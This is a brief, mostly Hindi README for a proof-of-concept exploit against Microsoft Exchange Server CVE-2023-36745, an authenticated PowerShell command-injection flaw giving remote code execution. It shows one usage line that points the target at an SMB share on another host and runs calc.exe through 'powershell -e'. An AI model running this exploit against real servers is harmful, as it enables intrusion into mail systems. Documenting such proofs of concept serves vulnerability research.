
Microsoft Exchange Server RCE भेद्यता CVE-2023-36745 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो प्रमाणित PowerShell कमांड इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन को सक्षम बनाता है।
Microsoft Exchange Server CVE-2023-36745 RCE PoC.
उदाहरण:
python3 exp.py -H exchange.webdxg.com -u webdxg.com\dddai -p 4IDF7LAU -s \\192.168.237.131\Shares\ -c calc.exe
कमांड powershell -e को पास किया जाएगा।